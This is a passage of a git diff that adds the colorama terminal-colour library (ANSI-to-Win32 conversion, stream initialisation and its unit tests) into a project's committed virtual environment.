WinColor.YELLOW, True), + AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True), + AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True), + AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True), + AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True), + } + return dict() + + def write(self, text): + if self.strip or self.convert: + self.write_and_convert(text) + else: + self.wrapped.write(text) + self.wrapped.flush() + if self.autoreset: + self.reset_all() + + + def reset_all(self): + if self.convert: + self.call_win32('m', (0,)) + elif not self.strip and not self.stream.closed: + self.wrapped.write(Style.RESET_ALL) + + + def write_and_convert(self, text): + ''' + Write the given text to our wrapped stream, stripping any ANSI + sequences from the text, and optionally converting them into win32 + calls. 
+ ''' + cursor = 0 + text = self.convert_osc(text) + for match in self.ANSI_CSI_RE.finditer(text): + start, end = match.span() + self.write_plain_text(text, cursor, start) + self.convert_ansi(*match.groups()) + cursor = end + self.write_plain_text(text, cursor, len(text)) + + + def write_plain_text(self, text, start, end): + if start < end: + self.wrapped.write(text[start:end]) + self.wrapped.flush() + + + def convert_ansi(self, paramstring, command): + if self.convert: + params = self.extract_params(command, paramstring) + self.call_win32(command, params) + + + def extract_params(self, command, paramstring): + if command in 'Hf': + params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';')) + while len(params) < 2: + # defaults: + params = params + (1,) + else: + params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0) + if len(params) == 0: + # defaults: + if command in 'JKm': + params = (0,) + elif command in 'ABCD': + params = (1,) + + return params + + + def call_win32(self, command, params): + if command == 'm': + for param in params: + if param in self.win32_calls: + func_args = self.win32_calls[param] + func = func_args[0] + args = func_args[1:] + kwargs = dict(on_stderr=self.on_stderr) + func(*args, **kwargs) + elif command in 'J': + winterm.erase_screen(params[0], on_stderr=self.on_stderr) + elif command in 'K': + winterm.erase_line(params[0], on_stderr=self.on_stderr) + elif command in 'Hf': # cursor position - absolute + winterm.set_cursor_position(params, on_stderr=self.on_stderr) + elif command in 'ABCD': # cursor position - relative + n = params[0] + # A - up, B - down, C - forward, D - back + x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command] + winterm.cursor_adjust(x, y, on_stderr=self.on_stderr) + + + def convert_osc(self, text): + for match in self.ANSI_OSC_RE.finditer(text): + start, end = match.span() + text = text[:start] + text[end:] + paramstring, command = match.groups() + if command == BEL: + if paramstring.count(";") == 1: + params = paramstring.split(";") + # 0 - change title and icon (we will only change title) + # 1 - change icon (we don't support this) + # 2 - change title + if params[0] in '02': + winterm.set_title(params[1]) + return text + + + def flush(self): + self.wrapped.flush() diff --git a/env/Lib/site-packages/colorama/initialise.py b/env/Lib/site-packages/colorama/initialise.py new file mode 100644 index 00000000..d5fd4b71 --- /dev/null +++ b/env/Lib/site-packages/colorama/initialise.py @@ -0,0 +1,121 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import atexit +import contextlib +import sys + +from .ansitowin32 import AnsiToWin32 + + +def _wipe_internal_state_for_tests(): + global orig_stdout, orig_stderr + orig_stdout = None + orig_stderr = None + + global wrapped_stdout, wrapped_stderr + wrapped_stdout = None + wrapped_stderr = None + + global atexit_done + atexit_done = False + + global fixed_windows_console + fixed_windows_console = False + + try: + # no-op if it wasn't registered + atexit.unregister(reset_all) + except AttributeError: + # python 2: no atexit.unregister. Oh well, we did our best. 
+ pass + + +def reset_all(): + if AnsiToWin32 is not None: # Issue #74: objects might become None at exit + AnsiToWin32(orig_stdout).reset_all() + + +def init(autoreset=False, convert=None, strip=None, wrap=True): + + if not wrap and any([autoreset, convert, strip]): + raise ValueError('wrap=False conflicts with any other arg=True') + + global wrapped_stdout, wrapped_stderr + global orig_stdout, orig_stderr + + orig_stdout = sys.stdout + orig_stderr = sys.stderr + + if sys.stdout is None: + wrapped_stdout = None + else: + sys.stdout = wrapped_stdout = \ + wrap_stream(orig_stdout, convert, strip, autoreset, wrap) + if sys.stderr is None: + wrapped_stderr = None + else: + sys.stderr = wrapped_stderr = \ + wrap_stream(orig_stderr, convert, strip, autoreset, wrap) + + global atexit_done + if not atexit_done: + atexit.register(reset_all) + atexit_done = True + + +def deinit(): + if orig_stdout is not None: + sys.stdout = orig_stdout + if orig_stderr is not None: + sys.stderr = orig_stderr + + +def just_fix_windows_console(): + global fixed_windows_console + + if sys.platform != "win32": + return + if fixed_windows_console: + return + if wrapped_stdout is not None or wrapped_stderr is not None: + # Someone already ran init() and it did stuff, so we won't second-guess them + return + + # On newer versions of Windows, AnsiToWin32.__init__ will implicitly enable the + # native ANSI support in the console as a side-effect. We only need to actually + # replace sys.stdout/stderr if we're in the old-style conversion mode. + new_stdout = AnsiToWin32(sys.stdout, convert=None, strip=None, autoreset=False) + if new_stdout.convert: + sys.stdout = new_stdout + new_stderr = AnsiToWin32(sys.stderr, convert=None, strip=None, autoreset=False) + if new_stderr.convert: + sys.stderr = new_stderr + + fixed_windows_console = True + +@contextlib.contextmanager +def colorama_text(*args, **kwargs): + init(*args, **kwargs) + try: + yield + finally: + deinit() + + +def reinit(): + if wrapped_stdout is not None: + sys.stdout = wrapped_stdout + if wrapped_stderr is not None: + sys.stderr = wrapped_stderr + + +def wrap_stream(stream, convert, strip, autoreset, wrap): + if wrap: + wrapper = AnsiToWin32(stream, + convert=convert, strip=strip, autoreset=autoreset) + if wrapper.should_wrap(): + stream = wrapper.stream + return stream + + +# Use this for initial setup as well, to reduce code duplication +_wipe_internal_state_for_tests() diff --git a/env/Lib/site-packages/colorama/tests/__init__.py b/env/Lib/site-packages/colorama/tests/__init__.py new file mode 100644 index 00000000..8c5661e9 --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/__init__.py @@ -0,0 +1 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. diff --git a/env/Lib/site-packages/colorama/tests/ansi_test.py b/env/Lib/site-packages/colorama/tests/ansi_test.py new file mode 100644 index 00000000..0a20c80f --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/ansi_test.py @@ -0,0 +1,76 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import sys +from unittest import TestCase, main + +from ..ansi import Back, Fore, Style +from ..ansitowin32 import AnsiToWin32 + +stdout_orig = sys.stdout +stderr_orig = sys.stderr + + +class AnsiTest(TestCase): + + def setUp(self): + # sanity check: stdout should be a file or StringIO object. 
+ # It will only be AnsiToWin32 if init() has previously wrapped it + self.assertNotEqual(type(sys.stdout), AnsiToWin32) + self.assertNotEqual(type(sys.stderr), AnsiToWin32) + + def tearDown(self): + sys.stdout = stdout_orig + sys.stderr = stderr_orig + + + def testForeAttributes(self): + self.assertEqual(Fore.BLACK, '\033[30m') + self.assertEqual(Fore.RED, '\033[31m') + self.assertEqual(Fore.GREEN, '\033[32m') + self.assertEqual(Fore.YELLOW, '\033[33m') + self.assertEqual(Fore.BLUE, '\033[34m') + self.assertEqual(Fore.MAGENTA, '\033[35m') + self.assertEqual(Fore.CYAN, '\033[36m') + self.assertEqual(Fore.WHITE, '\033[37m') + self.assertEqual(Fore.RESET, '\033[39m') + + # Check the light, extended versions. + self.assertEqual(Fore.LIGHTBLACK_EX, '\033[90m') + self.assertEqual(Fore.LIGHTRED_EX, '\033[91m') + self.assertEqual(Fore.LIGHTGREEN_EX, '\033[92m') + self.assertEqual(Fore.LIGHTYELLOW_EX, '\033[93m') + self.assertEqual(Fore.LIGHTBLUE_EX, '\033[94m') + self.assertEqual(Fore.LIGHTMAGENTA_EX, '\033[95m') + self.assertEqual(Fore.LIGHTCYAN_EX, '\033[96m') + self.assertEqual(Fore.LIGHTWHITE_EX, '\033[97m') + + + def testBackAttributes(self): + self.assertEqual(Back.BLACK, '\033[40m') + self.assertEqual(Back.RED, '\033[41m') + self.assertEqual(Back.GREEN, '\033[42m') + self.assertEqual(Back.YELLOW, '\033[43m') + self.assertEqual(Back.BLUE, '\033[44m') + self.assertEqual(Back.MAGENTA, '\033[45m') + self.assertEqual(Back.CYAN, '\033[46m') + self.assertEqual(Back.WHITE, '\033[47m') + self.assertEqual(Back.RESET, '\033[49m') + + # Check the light, extended versions. + self.assertEqual(Back.LIGHTBLACK_EX, '\033[100m') + self.assertEqual(Back.LIGHTRED_EX, '\033[101m') + self.assertEqual(Back.LIGHTGREEN_EX, '\033[102m') + self.assertEqual(Back.LIGHTYELLOW_EX, '\033[103m') + self.assertEqual(Back.LIGHTBLUE_EX, '\033[104m') + self.assertEqual(Back.LIGHTMAGENTA_EX, '\033[105m') + self.assertEqual(Back.LIGHTCYAN_EX, '\033[106m') + self.assertEqual(Back.LIGHTWHITE_EX, '\033[107m') + + + def testStyleAttributes(self): + self.assertEqual(Style.DIM, '\033[2m') + self.assertEqual(Style.NORMAL, '\033[22m') + self.assertEqual(Style.BRIGHT, '\033[1m') + + +if __name__ == '__main__': + main() diff --git a/env/Lib/site-packages/colorama/tests/ansitowin32_test.py b/env/Lib/site-packages/colorama/tests/ansitowin32_test.py new file mode 100644 index 00000000..91ca551f --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/ansitowin32_test.py @@ -0,0 +1,294 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 
+from io import StringIO, TextIOWrapper +from unittest import TestCase, main +try: + from contextlib import ExitStack +except ImportError: + # python 2 + from contextlib2 import ExitStack + +try: + from unittest.mock import MagicMock, Mock, patch +except ImportError: + from mock import MagicMock, Mock, patch + +from ..ansitowin32 import AnsiToWin32, StreamWrapper +from ..win32 import ENABLE_VIRTUAL_TERMINAL_PROCESSING +from .utils import osname + + +class StreamWrapperTest(TestCase): + + def testIsAProxy(self): + mockStream = Mock() + wrapper = StreamWrapper(mockStream, None) + self.assertTrue( wrapper.random_attr is mockStream.random_attr ) + + def testDelegatesWrite(self): + mockStream = Mock() + mockConverter = Mock() + wrapper = StreamWrapper(mockStream, mockConverter) + wrapper.write('hello') + self.assertTrue(mockConverter.write.call_args, (('hello',), {})) + + def testDelegatesContext(self): + mockConverter = Mock() + s = StringIO() + with StreamWrapper(s, mockConverter) as fp: + fp.write(u'hello') + self.assertTrue(s.closed) + + def testProxyNoContextManager(self): + mockStream = MagicMock() + mockStream.__enter__.side_effect = AttributeError() + mockConverter = Mock() + with self.assertRaises(AttributeError) as excinfo: + with StreamWrapper(mockStream, mockConverter) as wrapper: + wrapper.write('hello') + + def test_closed_shouldnt_raise_on_closed_stream(self): + stream = StringIO() + stream.close() + wrapper = StreamWrapper(stream, None) + self.assertEqual(wrapper.closed, True) + + def test_closed_shouldnt_raise_on_detached_stream(self): + stream = TextIOWrapper(StringIO()) + stream.detach() + wrapper = StreamWrapper(stream, None) + self.assertEqual(wrapper.closed, True) + +class AnsiToWin32Test(TestCase): + + def testInit(self): + mockStdout = Mock() + auto = Mock() + stream = AnsiToWin32(mockStdout, autoreset=auto) + self.assertEqual(stream.wrapped, mockStdout) + self.assertEqual(stream.autoreset, auto) + + @patch('colorama.ansitowin32.winterm', None) + @patch('colorama.ansitowin32.winapi_test', lambda *_: True) + def testStripIsTrueOnWindows(self): + with osname('nt'): + mockStdout = Mock() + stream = AnsiToWin32(mockStdout) + self.assertTrue(stream.strip) + + def testStripIsFalseOffWindows(self): + with osname('posix'): + mockStdout = Mock(closed=False) + stream = AnsiToWin32(mockStdout) + self.assertFalse(stream.strip) + + def testWriteStripsAnsi(self): + mockStdout = Mock() + stream = AnsiToWin32(mockStdout) + stream.wrapped = Mock() + stream.write_and_convert = Mock() + stream.strip = True + + stream.write('abc') + + self.assertFalse(stream.wrapped.write.called) + self.assertEqual(stream.write_and_convert.call_args, (('abc',), {})) + + def testWriteDoesNotStripAnsi(self): + mockStdout = Mock() + stream = AnsiToWin32(mockStdout) + stream.wrapped = Mock() + stream.write_and_convert = Mock() + stream.strip = False + stream.convert = False + + stream.write('abc') + + self.assertFalse(stream.write_and_convert.called) + self.assertEqual(stream.wrapped.write.call_args, (('abc',), {})) + + def assert_autoresets(self, convert, autoreset=True): + stream = AnsiToWin32(Mock()) + stream.convert = convert + stream.reset_all = Mock() + stream.autoreset = autoreset + stream.winterm = Mock() + + stream.write('abc') + + self.assertEqual(stream.reset_all.called, autoreset) + + def testWriteAutoresets(self): + self.assert_autoresets(convert=True) + self.assert_autoresets(convert=False) + self.assert_autoresets(convert=True, autoreset=False) + self.assert_autoresets(convert=False, 
autoreset=False) + + def testWriteAndConvertWritesPlainText(self): + stream = AnsiToWin32(Mock()) + stream.write_and_convert( 'abc' ) + self.assertEqual( stream.wrapped.write.call_args, (('abc',), {}) ) + + def testWriteAndConvertStripsAllValidAnsi(self): + stream = AnsiToWin32(Mock()) + stream.call_win32 = Mock() + data = [ + 'abc\033[mdef', + 'abc\033[0mdef', + 'abc\033[2mdef', + 'abc\033[02mdef', + 'abc\033[002mdef', + 'abc\033[40mdef', + 'abc\033[040mdef', + 'abc\033[0;1mdef', + 'abc\033[40;50mdef', + 'abc\033[50;30;40mdef', + 'abc\033[Adef', + 'abc\033[0Gdef', + 'abc\033[1;20;128Hdef', + ] + for datum in data: + stream.wrapped.write.reset_mock() + stream.write_and_convert( datum ) + self.assertEqual( + [args[0] for args in stream.wrapped.write.call_args_list], + [ ('abc',), ('def',) ] + ) + + def testWriteAndConvertSkipsEmptySnippets(self): + stream = AnsiToWin32(Mock()) + stream.call_win32 = Mock() + stream.write_and_convert( '\033[40m\033[41m' ) + self.assertFalse( stream.wrapped.write.called ) + + def testWriteAndConvertCallsWin32WithParamsAndCommand(self): + stream = AnsiToWin32(Mock()) + stream.convert = True + stream.call_win32 = Mock() + stream.extract_params = Mock(return_value='params') + data = { + 'abc\033[adef': ('a', 'params'), + 'abc\033[;;bdef': ('b', 'params'), + 'abc\033[0cdef': ('c', 'params'), + 'abc\033[;;0;;Gdef': ('G', 'params'), + 'abc\033[1;20;128Hdef': ('H', 'params'), + } + for datum, expected in data.items(): + stream.call_win32.reset_mock() + stream.write_and_convert( datum ) + self.assertEqual( stream.call_win32.call_args[0], expected ) + + def test_reset_all_shouldnt_raise_on_closed_orig_stdout(self): + stream = StringIO() + converter = AnsiToWin32(stream) + stream.close() + + converter.reset_all() + + def test_wrap_shouldnt_raise_on_closed_orig_stdout(self): + stream = StringIO() + stream.close() + with \ + patch("colorama.ansitowin32.os.name", "nt"), \ + patch("colorama.ansitowin32.winapi_test", lambda: True): + converter = AnsiToWin32(stream) + self.assertTrue(converter.strip) + self.assertFalse(converter.convert) + + def test_wrap_shouldnt_raise_on_missing_closed_attr(self): + with \ + patch("colorama.ansitowin32.os.name", "nt"), \ + patch("colorama.ansitowin32.winapi_test", lambda: True): + converter = AnsiToWin32(object()) + self.assertTrue(converter.strip) + self.assertFalse(converter.convert) + + def testExtractParams(self): + stream = AnsiToWin32(Mock()) + data = { + '': (0,), + ';;': (0,), + '2': (2,), + ';;002;;': (2,), + '0;1': (0, 1), + ';;003;;456;;': (3, 456), + '11;22;33;44;55': (11, 22, 33, 44, 55), + } + for datum, expected in data.items(): + self.assertEqual(stream.extract_params('m', datum), expected) + + def testCallWin32UsesLookup(self): + listener = Mock() + stream = AnsiToWin32(listener) + stream.win32_calls = { + 1: (lambda *_, **__: listener(11),), + 2: (lambda *_, **__: listener(22),), + 3: (lambda *_, **__: listener(33),), + } + stream.call_win32('m', (3, 1, 99, 2)) + self.assertEqual( + [a[0][0] for a in listener.call_args_list], + [33, 11, 22] ) + + def test_osc_codes(self): + mockStdout = Mock() + stream = AnsiToWin32(mockStdout, convert=True) + with patch('colorama.ansitowin32.winterm') as winterm: + data = [ + '\033]0\x07', # missing arguments + '\033]0;foo\x08', # wrong OSC command + '\033]0;colorama_test_title\x07', # should work + '\033]1;colorama_test_title\x07', # wrong set command + '\033]2;colorama_test_title\x07', # should work + '\033]' + ';' * 64 + '\x08', # see issue #247 + ] + for code in data: + 
stream.write(code) + self.assertEqual(winterm.set_title.call_count, 2) + + def test_native_windows_ansi(self): + with ExitStack() as stack: + def p(a, b): + stack.enter_context(patch(a, b, create=True)) + # Pretend to be on Windows + p("colorama.ansitowin32.os.name", "nt") + p("colorama.ansitowin32.winapi_test", lambda: True) + p("colorama.win32.winapi_test", lambda: True) + p("colorama.winterm.win32.windll", "non-None") + p("colorama.winterm.get_osfhandle", lambda _: 1234) + + # Pretend that our mock stream has native ANSI support + p( + "colorama.winterm.win32.GetConsoleMode", + lambda _: ENABLE_VIRTUAL_TERMINAL_PROCESSING, + ) + SetConsoleMode = Mock() + p("colorama.winterm.win32.SetConsoleMode", SetConsoleMode) + + stdout = Mock() + stdout.closed = False + stdout.isatty.return_value = True + stdout.fileno.return_value = 1 + + # Our fake console says it has native vt support, so AnsiToWin32 should + # enable that support and do nothing else. + stream = AnsiToWin32(stdout) + SetConsoleMode.assert_called_with(1234, ENABLE_VIRTUAL_TERMINAL_PROCESSING) + self.assertFalse(stream.strip) + self.assertFalse(stream.convert) + self.assertFalse(stream.should_wrap()) + + # Now let's pretend we're on an old Windows console, that doesn't have + # native ANSI support. + p("colorama.winterm.win32.GetConsoleMode", lambda _: 0) + SetConsoleMode = Mock() + p("colorama.winterm.win32.SetConsoleMode", SetConsoleMode) + + stream = AnsiToWin32(stdout) + SetConsoleMode.assert_called_with(1234, ENABLE_VIRTUAL_TERMINAL_PROCESSING) + self.assertTrue(stream.strip) + self.assertTrue(stream.convert) + self.assertTrue(stream.should_wrap()) + + +if __name__ == '__main__': + main() diff --git a/env/Lib/site-packages/colorama/tests/initialise_test.py b/env/Lib/site-packages/colorama/tests/initialise_test.py new file mode 100644 index 00000000..89f9b075 --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/initialise_test.py @@ -0,0 +1,189 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 
+import sys +from unittest import TestCase, main, skipUnless + +try: + from unittest.mock import patch, Mock +except ImportError: + from mock import patch, Mock + +from ..ansitowin32 import StreamWrapper +from ..initialise import init, just_fix_windows_console, _wipe_internal_state_for_tests +from .utils import osname, replace_by + +orig_stdout = sys.stdout +orig_stderr = sys.stderr + + +class InitTest(TestCase): + + @skipUnless(sys.stdout.isatty(), "sys.stdout is not a tty") + def setUp(self): + # sanity check + self.assertNotWrapped() + + def tearDown(self): + _wipe_internal_state_for_tests() + sys.stdout = orig_stdout + sys.stderr = orig_stderr + + def assertWrapped(self): + self.assertIsNot(sys.stdout, orig_stdout, 'stdout should be wrapped') + self.assertIsNot(sys.stderr, orig_stderr, 'stderr should be wrapped') + self.assertTrue(isinstance(sys.stdout, StreamWrapper), + 'bad stdout wrapper') + self.assertTrue(isinstance(sys.stderr, StreamWrapper), + 'bad stderr wrapper') + + def assertNotWrapped(self): + self.assertIs(sys.stdout, orig_stdout, 'stdout should not be wrapped') + self.assertIs(sys.stderr, orig_stderr, 'stderr should not be wrapped') + + @patch('colorama.initialise.reset_all') + @patch('colorama.ansitowin32.winapi_test', lambda *_: True) + @patch('colorama.ansitowin32.enable_vt_processing', lambda *_: False) + def testInitWrapsOnWindows(self, _): + with osname("nt"): + init() + self.assertWrapped() + + @patch('colorama.initialise.reset_all') + @patch('colorama.ansitowin32.winapi_test', lambda *_: False) + def testInitDoesntWrapOnEmulatedWindows(self, _): + with osname("nt"): + init() + self.assertNotWrapped() + + def testInitDoesntWrapOnNonWindows(self): + with osname("posix"): + init() + self.assertNotWrapped() + + def testInitDoesntWrapIfNone(self): + with replace_by(None): + init() + # We can't use assertNotWrapped here because replace_by(None) + # changes stdout/stderr already. 
+ self.assertIsNone(sys.stdout) + self.assertIsNone(sys.stderr) + + def testInitAutoresetOnWrapsOnAllPlatforms(self): + with osname("posix"): + init(autoreset=True) + self.assertWrapped() + + def testInitWrapOffDoesntWrapOnWindows(self): + with osname("nt"): + init(wrap=False) + self.assertNotWrapped() + + def testInitWrapOffIncompatibleWithAutoresetOn(self): + self.assertRaises(ValueError, lambda: init(autoreset=True, wrap=False)) + + @patch('colorama.win32.SetConsoleTextAttribute') + @patch('colorama.initialise.AnsiToWin32') + def testAutoResetPassedOn(self, mockATW32, _): + with osname("nt"): + init(autoreset=True) + self.assertEqual(len(mockATW32.call_args_list), 2) + self.assertEqual(mockATW32.call_args_list[1][1]['autoreset'], True) + self.assertEqual(mockATW32.call_args_list[0][1]['autoreset'], True) + + @patch('colorama.initialise.AnsiToWin32') + def testAutoResetChangeable(self, mockATW32): + with osname("nt"): + init() + + init(autoreset=True) + self.assertEqual(len(mockATW32.call_args_list), 4) + self.assertEqual(mockATW32.call_args_list[2][1]['autoreset'], True) + self.assertEqual(mockATW32.call_args_list[3][1]['autoreset'], True) + + init() + self.assertEqual(len(mockATW32.call_args_list), 6) + self.assertEqual( + mockATW32.call_args_list[4][1]['autoreset'], False) + self.assertEqual( + mockATW32.call_args_list[5][1]['autoreset'], False) + + + @patch('colorama.initialise.atexit.register') + def testAtexitRegisteredOnlyOnce(self, mockRegister): + init() + self.assertTrue(mockRegister.called) + mockRegister.reset_mock() + init() + self.assertFalse(mockRegister.called) + + +class JustFixWindowsConsoleTest(TestCase): + def _reset(self): + _wipe_internal_state_for_tests() + sys.stdout = orig_stdout + sys.stderr = orig_stderr + + def tearDown(self): + self._reset() + + @patch("colorama.ansitowin32.winapi_test", lambda: True) + def testJustFixWindowsConsole(self): + if sys.platform != "win32": + # just_fix_windows_console should be a no-op + just_fix_windows_console() + self.assertIs(sys.stdout, orig_stdout) + self.assertIs(sys.stderr, orig_stderr) + else: + def fake_std(): + # Emulate stdout=not a tty, stderr=tty + # to check that we handle both cases correctly + stdout = Mock() + stdout.closed = False + stdout.isatty.return_value = False + stdout.fileno.return_value = 1 + sys.stdout = stdout + + stderr = Mock() + stderr.closed = False + stderr.isatty.return_value = True + stderr.fileno.return_value = 2 + sys.stderr = stderr + + for native_ansi in [False, True]: + with patch( + 'colorama.ansitowin32.enable_vt_processing', + lambda *_: native_ansi + ): + self._reset() + fake_std() + + # Regular single-call test + prev_stdout = sys.stdout + prev_stderr = sys.stderr + just_fix_windows_console() + self.assertIs(sys.stdout, prev_stdout) + if native_ansi: + self.assertIs(sys.stderr, prev_stderr) + else: + self.assertIsNot(sys.stderr, prev_stderr) + + # second call without resetting is always a no-op + prev_stdout = sys.stdout + prev_stderr = sys.stderr + just_fix_windows_console() + self.assertIs(sys.stdout, prev_stdout) + self.assertIs(sys.stderr, prev_stderr) + + self._reset() + fake_std() + + # If init() runs first, just_fix_windows_console should be a no-op + init() + prev_stdout = sys.stdout + prev_stderr = sys.stderr + just_fix_windows_console() + self.assertIs(prev_stdout, sys.stdout) + self.assertIs(prev_stderr, sys.stderr) + + +if __name__ == '__main__': + main() diff --git a/env/Lib/site-packages/colorama/tests/isatty_test.py b/env/Lib/site-packages/colorama/tests/isatty_test.py 
new file mode 100644 index 00000000..0f84e4be --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/isatty_test.py @@ -0,0 +1,57 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import sys +from unittest import TestCase, main + +from ..ansitowin32 import StreamWrapper, AnsiToWin32 +from .utils import pycharm, replace_by, replace_original_by, StreamTTY, StreamNonTTY + + +def is_a_tty(stream): + return StreamWrapper(stream, None).isatty() + +class IsattyTest(TestCase): + + def test_TTY(self): + tty = StreamTTY() + self.assertTrue(is_a_tty(tty)) + with pycharm(): + self.assertTrue(is_a_tty(tty)) + + def test_nonTTY(self): + non_tty = StreamNonTTY() + self.assertFalse(is_a_tty(non_tty)) + with pycharm(): + self.assertFalse(is_a_tty(non_tty)) + + def test_withPycharm(self): + with pycharm(): + self.assertTrue(is_a_tty(sys.stderr)) + self.assertTrue(is_a_tty(sys.stdout)) + + def test_withPycharmTTYOverride(self): + tty = StreamTTY() + with pycharm(), replace_by(tty): + self.assertTrue(is_a_tty(tty)) + + def test_withPycharmNonTTYOverride(self): + non_tty = StreamNonTTY() + with pycharm(), replace_by(non_tty): + self.assertFalse(is_a_tty(non_tty)) + + def test_withPycharmNoneOverride(self): + with pycharm(): + with replace_by(None), replace_original_by(None): + self.assertFalse(is_a_tty(None)) + self.assertFalse(is_a_tty(StreamNonTTY())) + self.assertTrue(is_a_tty(StreamTTY())) + + def test_withPycharmStreamWrapped(self): + with pycharm(): + self.assertTrue(AnsiToWin32(StreamTTY()).stream.isatty()) + self.assertFalse(AnsiToWin32(StreamNonTTY()).stream.isatty()) + self.assertTrue(AnsiToWin32(sys.stdout).stream.isatty()) + self.assertTrue(AnsiToWin32(sys.stderr).stream.isatty()) + + +if __name__ == '__main__': + main() diff --git a/env/Lib/site-packages/colorama/tests/utils.py b/env/Lib/site-packages/colorama/tests/utils.py new file mode 100644 index 00000000..472fafb4 --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/utils.py @@ -0,0 +1,49 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +from contextlib import contextmanager +from io import StringIO +import sys +import os + + +class StreamTTY(StringIO): + def isatty(self): + return True + +class StreamNonTTY(StringIO): + def isatty(self): + return False + +@contextmanager +def osname(name): + orig = os.name + os.name = name + yield + os.name = orig + +@contextmanager +def replace_by(stream): + orig_stdout = sys.stdout + orig_stderr = sys.stderr + sys.stdout = stream + sys.stderr = stream + yield + sys.stdout = orig_stdout + sys.stderr = orig_stderr + +@contextmanager +def replace_original_by(stream): + orig_stdout = sys.__stdout__ + orig_stderr = sys.__stderr__ + sys.__stdout__ = stream + sys.__stderr__ = stream + yield + sys.__stdout__ = orig_stdout + sys.__stderr__ = orig_stderr + +@contextmanager +def pycharm(): + os.environ["PYCHARM_HOSTED"] = "1" + non_tty = StreamNonTTY() + with replace_by(non_tty), replace_original_by(non_tty): + yield + del os.environ["PYCHARM_HOSTED"] diff --git a/env/Lib/site-packages/colorama/tests/winterm_test.py b/env/Lib/site-packages/colorama/tests/winterm_test.py new file mode 100644 index 00000000..d0955f9e --- /dev/null +++ b/env/Lib/site-packages/colorama/tests/winterm_test.py @@ -0,0 +1,131 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 
+import sys +from unittest import TestCase, main, skipUnless + +try: + from unittest.mock import Mock, patch +except ImportError: + from mock import Mock, patch + +from ..winterm import WinColor, WinStyle, WinTerm + + +class WinTermTest(TestCase): + + @patch('colorama.winterm.win32') + def testInit(self, mockWin32): + mockAttr = Mock() + mockAttr.wAttributes = 7 + 6 * 16 + 8 + mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr + term = WinTerm() + self.assertEqual(term._fore, 7) + self.assertEqual(term._back, 6) + self.assertEqual(term._style, 8) + + @skipUnless(sys.platform.startswith("win"), "requires Windows") + def testGetAttrs(self): + term = WinTerm() + + term._fore = 0 + term._back = 0 + term._style = 0 + self.assertEqual(term.get_attrs(), 0) + + term._fore = WinColor.YELLOW + self.assertEqual(term.get_attrs(), WinColor.YELLOW) + + term._back = WinColor.MAGENTA + self.assertEqual( + term.get_attrs(), + WinColor.YELLOW + WinColor.MAGENTA * 16) + + term._style = WinStyle.BRIGHT + self.assertEqual( + term.get_attrs(), + WinColor.YELLOW + WinColor.MAGENTA * 16 + WinStyle.BRIGHT) + + @patch('colorama.winterm.win32') + def testResetAll(self, mockWin32): + mockAttr = Mock() + mockAttr.wAttributes = 1 + 2 * 16 + 8 + mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr + term = WinTerm() + + term.set_console = Mock() + term._fore = -1 + term._back = -1 + term._style = -1 + + term.reset_all() + + self.assertEqual(term._fore, 1) + self.assertEqual(term._back, 2) + self.assertEqual(term._style, 8) + self.assertEqual(term.set_console.called, True) + + @skipUnless(sys.platform.startswith("win"), "requires Windows") + def testFore(self): + term = WinTerm() + term.set_console = Mock() + term._fore = 0 + + term.fore(5) + + self.assertEqual(term._fore, 5) + self.assertEqual(term.set_console.called, True) + + @skipUnless(sys.platform.startswith("win"), "requires Windows") + def testBack(self): + term = WinTerm() + term.set_console = Mock() + term._back = 0 + + term.back(5) + + self.assertEqual(term._back, 5) + self.assertEqual(term.set_console.called, True) + + @skipUnless(sys.platform.startswith("win"), "requires Windows") + def testStyle(self): + term = WinTerm() + term.set_console = Mock() + term._style = 0 + + term.style(22) + + self.assertEqual(term._style, 22) + self.assertEqual(term.set_console.called, True) + + @patch('colorama.winterm.win32') + def testSetConsole(self, mockWin32): + mockAttr = Mock() + mockAttr.wAttributes = 0 + mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr + term = WinTerm() + term.windll = Mock() + + term.set_console() + + self.assertEqual( + mockWin32.SetConsoleTextAttribute.call_args, + ((mockWin32.STDOUT, term.get_attrs()), {}) + ) + + @patch('colorama.winterm.win32') + def testSetConsoleOnStderr(self, mockWin32): + mockAttr = Mock() + mockAttr.wAttributes = 0 + mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr + term = WinTerm() + term.windll = Mock() + + term.set_console(on_stderr=True) + + self.assertEqual( + mockWin32.SetConsoleTextAttribute.call_args, + ((mockWin32.STDERR, term.get_attrs()), {}) + ) + + +if __name__ == '__main__': + main() diff --git a/env/Lib/site-packages/colorama/win32.py b/env/Lib/site-packages/colorama/win32.py new file mode 100644 index 00000000..841b0e27 --- /dev/null +++ b/env/Lib/site-packages/colorama/win32.py @@ -0,0 +1,180 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 
